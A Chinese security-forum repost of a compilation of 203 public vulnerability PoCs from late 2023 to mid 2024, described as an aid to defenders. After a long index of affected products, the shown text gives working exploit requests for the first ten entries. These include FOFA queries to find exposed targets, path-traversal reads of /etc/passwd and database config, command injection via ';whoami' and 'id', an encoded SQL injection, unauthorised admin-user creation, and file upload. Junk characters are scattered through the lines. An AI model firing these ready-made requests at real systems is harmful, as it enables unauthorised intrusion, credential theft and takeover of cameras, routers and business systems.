找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3791|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406
1 L+ e/ [2 s; y# e7 ]道一安全 2024-06-05 07:41 北京
2 y. E" a+ b2 _( {6 }以下文章来源于网络安全新视界 ,作者网络安全新视界; G, |- X  d1 u5 h- C; k

2 s2 Y! W2 o" |$ H# n发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
+ p5 y4 F" d: t( X! l
# g8 m; ]7 L9 J: w* J) U  K漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。( x5 @% ~4 x2 T; B) _

- a' V: v" I  {( f! S; W安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。+ y: F2 d7 v! K- o

* h# C; L# k) K2 n文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。0 f4 k7 J" `9 q/ o# [8 P
/ V$ M) x; y  C$ i
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。2 v( {8 V$ u" s, A. L% A

1 Z. W5 n* f4 e8 ?
! B& ?  S. p& K4 G/ P) Y0 ~0 `声明
$ Y: d0 d% x2 z. ]6 y% ~
5 d: h% N2 ^! E% l. k  L为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。+ ]- e' z$ n- z5 a4 W4 m
, r: c3 X: y, I% e" R1 g2 c$ h
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。# y+ ^: T0 Y" Z, |/ n) G
+ @! k. o( i6 y3 g
& ~. J, `8 n, ~6 p* ^

( M/ O) w  C  y2 y目录
1 m8 D0 z. C$ v& f! W+ W+ U6 G; V: I: x" w5 a' {4 B" W# f
01
0 ?0 z  R$ l3 ?3 O: P# c
  r, d5 P" `, G/ Q8 r1. StarRocks MPP数据库未授权访问  q& w2 x% Y' c
2. Casdoor系统static任意文件读取) w, }) Q2 X+ R6 |7 m  b
3. EasyCVR智能边缘网关 userlist 信息泄漏
2 D; G) ]5 ~6 Z& T+ i, r" |4. EasyCVR视频管理平台存在任意用户添加
6 i: W+ O; _6 Q' i5. NUUO NVR 视频存储管理设备远程命令执行
1 t: l% ]1 ]: c: {6 k2 H/ s6. 深信服 NGAF 任意文件读取9 k6 N) K2 n# @6 x
7. 鸿运主动安全监控云平台任意文件下载0 ^5 ^5 @4 J1 G/ x/ |
8. 斐讯 Phicomm 路由器RCE& m7 G; ^5 A; L$ n. A! @( Q  B9 @
9. 稻壳CMS keyword 未授权SQL注入
1 B& p. `5 _' Q& ^: o" U0 K10. 蓝凌EIS智慧协同平台api.aspx任意文件上传; I9 M3 X6 g4 V
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入7 i+ W# d, I) s; D& ~% u
12. Jorani < 1.0.2 远程命令执行: {  P5 x0 K- E! j+ m
13. 红帆iOffice ioFileDown任意文件读取
$ _9 Y; U7 J) e( s* {, U14. 华夏ERP(jshERP)敏感信息泄露
$ ^- @1 h/ f! g4 O  C% W8 `7 G15. 华夏ERP getAllList信息泄露
) H4 J& d$ i: k- R16. 红帆HFOffice医微云SQL注入4 C/ ^8 ~: Y  E; v
17. 大华 DSS itcBulletin SQL 注入
7 y* T; g1 D5 f- ]; `/ v, [' m9 c9 e* {6 g18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
; r$ b1 C4 Q! q' J& r19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入/ D  [6 @- z" p
20. 大华ICC智能物联综合管理平台任意文件读取  K0 G2 ]0 ~! ~9 d, j2 [& ^+ s
21. 大华ICC智能物联综合管理平台random远程代码执行3 I- l" D# N1 O
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
2 a" x4 m; h5 @6 F23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
1 H5 q# m4 c0 P. R2 K24. 用友NC 6.5 accept.jsp任意文件上传
! @  J9 b: l5 D/ h5 h" h7 B& |25. 用友NC registerServlet JNDI 远程代码执行: |" [( z3 O! x
26. 用友NC linkVoucher SQL注入
7 i. D4 ~( A- v27. 用友 NC showcontent SQL注入5 E# c# |! j4 W
28. 用友NC grouptemplet 任意文件上传, \; x5 Y. {; I( i# p& K# v. Q& F
29. 用友NC down/bill SQL注入: y4 K8 E% ^$ p6 z$ E  Q8 Y
30. 用友NC importPml SQL注入1 P) |8 w. ]. Y" I! B' `4 f- q+ I1 B
31. 用友NC runStateServlet SQL注入
( }* }) N  F0 i32. 用友NC complainbilldetail SQL注入
7 x9 R( L7 g- V9 T- a! w33. 用友NC downTax/download SQL注入
2 F' v) H7 W: i0 D1 o$ W34. 用友NC warningDetailInfo接口SQL注入" M( f- A  ^2 S" C$ A
35. 用友NC-Cloud importhttpscer任意文件上传  S/ l  r$ i0 T' |& ^! ~
36. 用友NC-Cloud soapFormat XXE5 `: l! h6 z' s- K8 y6 M% L- f
37. 用友NC-Cloud IUpdateService XXE
2 p. x1 e( C3 B: _' [  I9 A38. 用友U8 Cloud smartweb2.RPC.d XXE
# i- H3 R1 z! \* c39. 用友U8 Cloud RegisterServlet SQL注入; w7 K. e6 H* E  ?0 p
40. 用友U8-Cloud XChangeServlet XXE+ c2 {1 p# ?( w: m: O
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
4 G  _& ]4 f% [- }$ v, [$ X% b42. 用友GRP-U8 SmartUpload01 文件上传- w6 E; r" V( D/ Y
43. 用友GRP-U8 userInfoWeb SQL注入致RCE9 F# M% `0 K* L( a& ?' d
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
; G8 {- D3 I$ `/ y5 W  {45. 用友GRP-U8 ufgovbank XXE, O$ W! @' E6 o# U' q9 W
46. 用友GRP-U8 sqcxIndex.jsp SQL注入' L4 ]. c! S+ a0 y$ u
47. 用友GRP A++Cloud 政府财务云 任意文件读取* k# y4 H* c5 k5 k( {
48. 用友U8 CRM swfupload 任意文件上传# A. C8 A' h5 g, W# G: _( {0 W
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
& x, ^7 E& w( a* H50. QDocs Smart School 6.4.1 filterRecords SQL注入
( ~5 ~2 s0 e" a7 ]: X# M51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入$ C: x2 V  w5 D" c- H
52. 泛微E-Office json_common.php sql注入& E0 X" O5 O. j% J4 I
53. 迪普 DPTech VPN Service 任意文件上传
' U! P' m# i( ?, p% n! S: N! c54. 畅捷通T+ getstorewarehousebystore 远程代码执行3 J0 o3 T- |7 Z: L# I6 s, s
55. 畅捷通T+ getdecallusers信息泄露
8 g# d0 K0 a( F0 d* X) {56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
5 }) n- B( ~7 O9 V  C' _57. 畅捷通T+ keyEdit.aspx SQL注入( {% C. c0 e) c$ X6 X7 z
58. 畅捷通T+ KeyInfoList.aspx sql注入
  r1 q! A7 y8 p. V# d& ]59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" V# v0 Q: R1 W1 E' `60. 百卓Smart管理平台 importexport.php SQL注入
( H7 ^  T; K- I5 ^61. 浙大恩特客户资源管理系统 fileupload 任意文件上传4 V7 o) L4 `2 d, X% Y  ^& D9 ?: r
62. IP-guard WebServer 远程命令执行' g! Z" F2 n: ]: c3 `& o6 G5 d
63. IP-guard WebServer任意文件读取1 k# m8 q3 z& W' J7 s9 S
64. 捷诚管理信息系统CWSFinanceCommon SQL注入1 K% _; {5 @  e/ E# K- e$ v
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
3 s  f  j. ?  c2 h3 ~66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入; Y; ~; o. g" x! ^) x1 j
67. 万户ezOFFICE wpsservlet任意文件上传
: T" H% B! b9 A: u+ Z68. 万户ezOFFICE wf_printnum.jsp SQL注入
! U! e- J( z) X! X- C- s69. 万户 ezOFFICE contract_gd.jsp SQL注入
  J* {1 L7 S6 ?9 S70. 万户ezEIP success 命令执行8 q6 M2 M$ `2 k+ Y
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
1 H* n7 G" g$ v72. 致远OA getAjaxDataServlet XXE, P; ]5 s# Q. _$ H# {
73. GeoServer wms远程代码执行
) M3 z+ H: @3 m9 Z- i74. 致远M3-server 6_1sp1 反序列化RCE8 M6 ^4 ]/ s5 S$ M6 Z
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
/ }( J0 R2 G0 b" S6 ~7 v" x* H76. 新开普掌上校园服务管理平台service.action远程命令执行1 v$ @3 A& F6 s8 V- Y  c: w
77. F22服装管理软件系统UploadHandler.ashx任意文件上传6 \/ j( O6 w( ~3 p, Q1 ^- I
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传0 N$ ]8 [' K+ e( h3 D2 C) a- j
79. BYTEVALUE 百为流控路由器远程命令执行
1 p' X. Q8 |/ E- P0 I/ {3 v80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传7 L  ]* t/ S) o% h6 `9 |9 v
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露: z" s% }) a, Y1 K4 D$ b$ q! C, ~& C
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行: K/ N, X9 ~9 ?5 c5 f$ d% C- R
83. JeecgBoot testConnection 远程命令执行, a- O* U/ n( l. P
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
/ H& r; r( ~" L$ R85. SysAid On-premise< 23.3.36远程代码执行
  C5 B2 v! a: p9 X' j8 N) a6 S, g86. 日本tosei自助洗衣机RCE
, e& O) @) Q! E! e# m87. 安恒明御安全网关aaa_local_web_preview文件上传
8 G* s4 r' N  ]6 x6 \88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行0 `5 n+ U  K. M9 W& O3 ^2 L' _+ _
89. 致远互联FE协作办公平台editflow_manager存在sql注入
: V$ i3 d! B0 |9 u5 k7 o90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行* z9 G8 a5 a5 M0 R6 a- s5 a
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
' p' `# L4 [0 |92. 海康威视运行管理中心session命令执行
, B& |3 a* q9 b: r93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传* g# F' |8 C; P# t
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
2 F( o5 U- R( H7 b4 e95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
) g. N' R' W5 y0 N& ]! w) q96. Apache OFBiz  18.12.11 groovy 远程代码执行
, a' t( Q* n' q$ |5 L. k- }" ?97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
* ]# U' h! E; Y/ g! U: U0 |( S, C7 _98. SpiderFlow爬虫平台远程命令执行5 g. b6 Z  h( o
99. Ncast盈可视高清智能录播系统busiFacade RCE
2 F: H9 F3 g2 C100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传) d( O7 B" H  B6 |0 N8 {" F! h
101. ivanti policy secure-22.6命令注入7 j! ?8 K: p, _$ ]
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
, r( \3 ]: X3 Z  ]103. Ivanti Pulse Connect Secure VPN XXE
" O3 D0 `2 j0 d: A0 Y104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露  {7 n" B/ A5 h' a- u& K$ z
105. SpringBlade v3.2.0 export-user SQL 注入! H8 R' g! @6 ^4 p7 t7 q+ E
106. SpringBlade dict-biz/list SQL 注入' Q0 u; n5 O( L5 T( C- e  ^9 B
107. SpringBlade tenant/list SQL 注入
3 t1 d1 w9 A5 r& b# D9 N108. D-Tale 3.9.0 SSRF' r; k8 L; D8 s5 }/ r7 y
109. Jenkins CLI 任意文件读取$ @' k5 v  i7 E5 C) P
110. Goanywhere MFT 未授权创建管理员& a: U  q% o/ C! i: A( r
111. WordPress Plugin HTML5 Video Player SQL注入
' a' F: p# a8 U112. WordPress Plugin NotificationX SQL 注入8 n/ G0 T9 D- B
113. WordPress Automatic 插件任意文件下载和SSRF
: Q% @$ \' j) i" A114. WordPress MasterStudy LMS插件 SQL注入
7 n9 t0 ~% n4 s& Y# ]- b: y115. WordPress Bricks Builder <= 1.9.6 RCE
  S4 p3 d3 G; K" N: s, S116. wordpress js-support-ticket文件上传% @/ M8 D! p& y( T9 W+ G/ d6 N
117. WordPress LayerSlider插件SQL注入! e$ S: Y  Q$ m% t* K
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传0 O8 R0 p9 ~" a) j
119. 北京百绰智能S20后台sysmanageajax.php sql注入( Q- `* ]1 D' Q
120. 北京百绰智能S40管理平台导入web.php任意文件上传$ g3 q  {. o( E& @
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
6 S- b. J: m# P0 ^122. 北京百绰智能s200管理平台/importexport.php sql注入
; z  k7 S" Z$ O  C& `123. Atlassian Confluence 模板注入代码执行7 M& T4 Q6 K! t0 l
124. 湖南建研工程质量检测系统任意文件上传2 V# o( |9 X$ x3 D4 v
125. ConnectWise ScreenConnect身份验证绕过
/ b7 }$ I" B6 c3 w4 K" b/ A* B126. Aiohttp 路径遍历
7 \) v/ d: h: w* n+ c. A( H127. 广联达Linkworks DataExchange.ashx XXE+ Y# n% B6 G3 h) ^, B5 C/ z
128. Adobe ColdFusion 反序列化2 Q, v% h9 L4 v
129. Adobe ColdFusion 任意文件读取$ I$ R' E8 B$ A9 W7 {8 F
130. Laykefu客服系统任意文件上传2 e& F2 k& N+ ]; }! v# {; ~3 r
131. Mini-Tmall <=20231017 SQL注入. u5 E& X' q& [% H/ L, {
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过- P# A; y) y/ \  @+ A) a% A$ J
133. H5 云商城 file.php 文件上传
. P9 F. B% E5 w- I6 F1 d: ^134. 网康NS-ASG应用安全网关index.php sql注入4 H/ {& x6 g2 f4 k) G6 b; O
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
7 }" c9 r0 V2 }6 [2 c- P4 s0 d136. NextChat cors SSRF
# q" R5 s3 l, a% Q/ i% U. P137. 福建科立迅通信指挥调度平台down_file.php sql注入
) |) U7 `% M+ p9 I; m138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
; W- y+ T  g; Q9 |; d+ F# s- N; }139. 福建科立讯通信指挥调度平台editemedia.php sql注入
0 |7 V! Z3 q) N0 @140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
- h5 R; B1 M7 p/ `- l- Z141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
7 z; A, j! \. E142. CMSV6车辆监控平台系统中存在弱密码
/ E! f' d. ]. M  u143. Netis WF2780 v2.1.40144 远程命令执行4 {# e+ ~9 i% d2 [  D( }9 U
144. D-Link nas_sharing.cgi 命令注入
, t9 V+ w" T. g( B145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
# M, u$ B; s+ A- u) g" ?146. MajorDoMo thumb.php 未授权远程代码执行+ S3 s: S1 U# v1 L
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历! p, R" F5 Q, x! L! @5 D' F/ z
148. CrushFTP 认证绕过模板注入& f# V* P) \, I2 ]# h1 y# p% O" p
149. AJ-Report开源数据大屏存在远程命令执行1 f+ h' {& `7 v' }' D0 N
150. AJ-Report 1.4.0 认证绕过与远程代码执行
  J7 F4 v/ b4 @4 R- Q151. AJ-Report 1.4.1 pageList sql注入
6 E- S# t% @% v" _152. Progress Kemp LoadMaster 远程命令执行
1 z- G0 ^2 i) M# d' ?3 G; v153. gradio任意文件读取3 @+ I. T+ C8 L# N
154. 天维尔消防救援作战调度平台 SQL注入
+ ]& A- x- ]3 t4 c9 r% d155. 六零导航页 file.php 任意文件上传
8 }* M$ `+ ?4 O' b, y! G" b156. TBK DVR-4104/DVR-4216 操作系统命令注入
9 T. l! f& n+ V( ^157. 美特CRM upload.jsp 任意文件上传+ C/ j8 b; X1 y/ s" a5 s) g3 [+ H- D& P
158. Mura-CMS-processAsyncObject存在SQL注入0 J9 l9 C3 {6 G) R- o
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
+ n  F# l) D/ B9 r' _160. Sonatype Nexus Repository 3目录遍历与文件读取
; f& z1 G: R* [* c161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传) r' E/ O# B' D+ @" D+ p
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传+ ]2 x3 h1 Q" Y. w3 o- M3 N
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传! O5 L0 `8 _/ C+ m
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
0 t' z, J; k( B, q* y1 d( I165. OrangeHRM 3.3.3 SQL 注入1 w! I2 D& |1 h; J& q
166. 中成科信票务管理平台SeatMapHandler SQL注入
. }+ T* D8 a; I0 ~& v% u" K167. 精益价值管理系统 DownLoad.aspx任意文件读取
4 B" N( R' V9 G1 ^: E: ^* f168. 宏景EHR OutputCode 任意文件读取
) `# r6 l: ^. ]169. 宏景EHR downlawbase SQL注入
7 E( J2 h1 ~6 w( {; ^& U' F170. 宏景EHR DisplayExcelCustomReport 任意文件读取8 d+ Y& \7 _# Y  {9 [
171. 通天星CMSV6车载定位监控平台 SQL注入
% q- ?7 o  s' a5 c, n' J6 T172. DT-高清车牌识别摄像机任意文件读取
6 P+ g) W% i( [9 n  f& i173. Check Point 安全网关任意文件读取
% l8 ^6 b$ o0 u: D" L$ ^/ S174. 金和OA C6 FileDownLoad.aspx 任意文件读取
' O2 w/ y# S' U3 P: Y- o, z" c8 X175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入# w. L3 U/ H5 J# k# I- H
176. 电信网关配置管理系统 rewrite.php 文件上传9 e( W; Y5 d! c0 H$ Y  l+ y
177. H3C路由器敏感信息泄露
2 d  b: U- P- d, [. V178. H3C校园网自助服务系统-flexfileupload-任意文件上传8 S6 e' ~8 {) ^* X* y1 d
179. 建文工程管理系统存在任意文件读取! M* j$ C6 |4 e! g$ ~; r' L; H8 o& h" r
180. 帮管客 CRM jiliyu SQL注入" @8 t2 C& S  x" g% Y
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
- e* w7 C% _4 d) k. [182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
& L% ~: W5 @4 r- w* {8 N/ Z+ I183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
" A0 T8 R& v# s% f184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加* e4 V: c, c8 J2 K
185. 瑞友天翼应用虚拟化系统SQL注入
- G. _" y, X9 a1 O186. F-logic DataCube3 SQL注入& {$ k; S; z/ {9 t
187. Mura CMS processAsyncObject SQL注入2 K  C! X9 x5 d! P' P8 W- E" W/ E
188. 叁体-佳会视频会议 attachment 任意文件读取, d& E( s5 j- r$ n$ e# J8 y  L
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 R# S9 `" S( z1 \& t. Y190. 短视频矩阵营销系统 poihuoqu 任意文件读取- O/ p/ `9 j) N5 [0 r/ T) t, X! D
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
: A4 R! O9 ]. C192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
4 E% n+ D( I$ |4 a, F193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行& _+ g. e6 z5 G/ i
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
& A( j) s/ B) q! R( H195. 飞鱼星上网行为管理系统 send_order.cgi命令执行, s6 n$ F- t8 a0 d, z4 Q3 D
196. 河南省风速科技统一认证平台密码重置' R( P3 m. m' y! ]+ X
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入) E2 J+ v7 T% W% T. a7 ]3 k3 W
198.  阿里云盘 WebDAV 命令注入
  U( ]1 s' ]: ]( V  \% l, S9 ?199. cockpit系统assetsmanager_upload接口 文件上传
+ @+ ]& N2 E+ P& S200. SeaCMS海洋影视管理系统dmku SQL注入
- `9 t6 `0 A$ p8 |201. 方正全媒体新闻采编系统 binary SQL注入
1 b2 R2 e6 D- M2 w, Z202. 微擎系统 AccountEdit任意文件上传
2 N  M: t  u! n! }# P203. 红海云EHR PtFjk 文件上传
  Y4 H) n- G! ~3 V; V5 s
) P2 H: f) T2 Y9 \3 C" P+ gPOC列表
% F4 a6 c# n) E* Z) E, H$ T6 X! k! `0 f& l$ @
02, N- a+ b6 w6 v; k- \
/ D, [% ~: O8 H. }( V) Q
1. StarRocks MPP数据库未授权访问
5 [2 z2 Z8 z+ b3 O! Z  E; hFOFA :title="StarRocks"9 z5 a+ W; I* u
GET /mem_tracker HTTP/1.1$ Q3 n4 [) E. e% R' E
Host: URL5 E$ z9 r6 e+ N4 e
! H" `2 G0 E6 r" B( w( A# m# M+ f

6 a  x+ R' R/ _; C  G, J2. Casdoor系统static任意文件读取1 f& P# I( v5 ~! H$ `
FOFA :title="Casdoor"$ E$ [, i2 W3 M0 d& m' X
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
( E+ M& G  u$ b& ?Host: xx.xx.xx.xx:99993 ^: _! k/ O& Z8 x4 o; s  z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
  ~& w9 V: V/ t. {Connection: close  l% }! [6 n* O' d( j( f
Accept: */*
% L( n/ r5 f0 p* F4 I6 H5 s" C& N6 HAccept-Language: en- W! s5 `/ k1 ]
Accept-Encoding: gzip
2 ?5 n4 u2 Y/ x! Q2 G+ `1 n# X- M* ^0 `( |3 [, U# B5 ^

  u4 T; N8 @' A  k4 B3. EasyCVR智能边缘网关 userlist 信息泄漏4 ^# U6 U/ e/ @' N2 U
FOFA :title="EasyCVR"# L8 R7 Q* a! f0 Q& F# w* T; \
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1% y' L2 K& f, ~
Host: xx.xx.xx.xx0 ?$ [, y0 B. ?$ K+ Q8 y5 Q1 k( \0 i
3 g8 p- w: H+ E( F6 |3 Q5 P8 O

1 K. @3 n! }' S; ^4. EasyCVR视频管理平台存在任意用户添加" w4 Z! X+ O+ {. @0 ^# @) o9 h6 o
FOFA :title="EasyCVR"
7 s* {) q" N& M( V/ }  i( O0 n7 n9 b% {
password更改为自己的密码md5
# ?3 @1 N- g! W' M0 V& r% ^POST /api/v1/adduser HTTP/1.1
' d- R6 l% W! @Host: your-ip
7 u1 w7 D+ \2 F. Z3 c0 PContent-Type: application/x-www-form-urlencoded; charset=UTF-8) K& ^& o8 p0 Y0 n9 q! u4 H

0 U3 P6 z& s$ O8 T* |& A8 q( ^& bname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
) t( J* q$ v8 g7 |( B' R9 Z
4 C- C! t5 x) Q. Q; K/ k
! c( R& Z) d/ D" n3 H+ q5. NUUO NVR 视频存储管理设备远程命令执行
% U# m, Q9 W% @6 `  CFOFA:title="Network Video Recorder Login"8 F: B8 N: f; `3 I0 j. `$ o
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1: s, f+ z: m4 S9 W. B' a4 D
Host: xx.xx.xx.xx
& ~# I( V8 n; W: l1 N! p4 X3 S  r! r8 ], P1 ~1 j0 }* B; U
) {/ ?5 d9 M) ~) G3 }+ J: v
6. 深信服 NGAF 任意文件读取
( t: l9 G; }, J2 c8 oFOFA:title="SANGFOR | NGAF"2 P* y+ |* D: A
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1' I2 n' F* w) U9 t1 [& y6 ~
Host:- C+ A' N( A: p
' V2 O8 [# m! q$ m1 \7 Z
5 r6 E' I9 q- g, [- L
7. 鸿运主动安全监控云平台任意文件下载
& N+ g& U2 ^2 BFOFA:body="./open/webApi.html"
; a$ ]$ G* A6 Q8 XGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
7 p, i( }( D, M: Y- \3 r  l. AHost:" c8 }  B4 Y4 F1 I8 c4 B2 G

+ ]0 l+ T% `3 V7 n; I4 l+ b1 c% q! P2 y, }2 N! V# }( ^
8. 斐讯 Phicomm 路由器RCE
5 b6 V( ]5 a) d8 e1 ~FOFA:icon_hash="-1344736688"$ f8 L' o5 O$ z' e1 A& O
默认账号admin登录后台后,执行操作
% @; l# l9 _4 QPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
4 R& S. n! D0 y% i2 `+ F6 [# u5 ~; V, IHost: x.x.x.x
3 g5 P! z1 f5 G% T0 ~- L  O9 ^* m5 |Cookie: sysauth=第一步登录获取的cookie% v- A1 ?( M4 A% T4 {) i' o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
. f4 c% f, x% JUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. ]2 D$ G3 }3 b- }' w" Q/ A  T$ G
+ G( I6 t; b( j8 K6 f
------WebKitFormBoundaryxbgjoytz4 _8 }# H# N8 ]) F
Content-Disposition: form-data; name="wifiRebootEnablestatus"/ C; ?, X! K) P1 B2 F
; ]/ g/ X" A" B
%s9 {- L# G+ A" w1 z2 i  t
------WebKitFormBoundaryxbgjoytz
+ n/ ?8 Z: r! {; d3 E3 a+ ~6 V& k8 mContent-Disposition: form-data; name="wifiRebootrange"; B. ^0 \1 \- \1 `. Z  |$ a; R

9 ~7 g* B# W  B& q, \  \' K! F12:00; id;, E& h. i& H0 Y/ V% E4 s7 g
------WebKitFormBoundaryxbgjoytz
* }( P- L. L$ T2 G! G( zContent-Disposition: form-data; name="wifiRebootendrange"
8 J8 p4 K2 Y6 v
1 c1 f% x' c# H: k0 Z%s:
+ z! v1 C5 c/ H( ^1 V, g------WebKitFormBoundaryxbgjoytz
0 ?0 F/ G* o% W& {* lContent-Disposition: form-data; name="cururl2"
( P2 m! z! {* \5 J( p1 B/ E6 ]9 r  [* ]( ]

  a* z: L5 ^+ v' C------WebKitFormBoundaryxbgjoytz--
' L, @1 }+ Y" V; j( u3 V1 R* Q. w8 I! a
; `2 G3 b3 D7 _* I* k! V8 h
9. 稻壳CMS keyword 未授权SQL注入
$ v& u6 u8 M+ L( a  aFOFA:app="Doccms"# y+ g0 P, ~  `' P  i& \" }
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.15 x0 `; J" q2 H/ l% v# _
Host: x.x.x.x
& l! `8 ?' g# H0 R/ ~+ a- X$ n
9 |* k. ^5 ^9 ^; Z( H; r) O0 z  J0 z* _. I
payload为下列语句的二次Url编码) k/ L: _& {) N. O! U
9 p9 c4 M) k8 m' E
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#  u, p9 R% j+ L+ {. T# e
0 I( P# P& G/ O+ u  \
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传5 a% \$ O5 h! J" N5 `' U
FOFA:icon_hash="953405444"3 P4 X5 P8 l3 E  S/ L2 S
: |1 \- ]0 j+ y# s& ~1 F0 ^! v' w8 s
文件上传后响应中包含上传文件的路径$ x8 ~& g: L" u1 Y
POST /eis/service/api.aspx?action=saveImg HTTP/1.1( r" P" L0 Y9 |; G- o5 v
Host: x.x.x.x:xx1 p5 Q% O% G+ D# m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.368 m* b$ f5 ]! i, d1 I" {  y/ U
Content-Length: 1977 |& n( Z3 {1 z8 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' p- Q$ \" ?0 h2 q
Accept-Encoding: gzip, deflate
0 L! I% W& l$ T4 f' \$ OAccept-Language: zh-CN,zh;q=0.9
& r; `2 B+ r. b* \+ G& F2 s- w8 vConnection: close# L8 s2 I8 x5 A; Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
% w  ]: B1 F  p' w& O! q
  x: Z: I1 |9 ^& O& P) J------WebKitFormBoundaryxdgaqmqu
: r8 k" T: P+ K' r7 @* AContent-Disposition: form-data; name="file"filename="icfitnya.txt"
8 E: M7 t+ X' q+ _+ L- ~Content-Type: text/html' L- H. g1 |6 V2 I% h

8 \2 E$ P2 }) A% G2 n5 u  e, i0 \jmnqjfdsupxgfidopeixbgsxbf% p4 y& o& W( G0 m% F. [
------WebKitFormBoundaryxdgaqmqu--6 d; ^3 u2 g" y/ P# v4 x

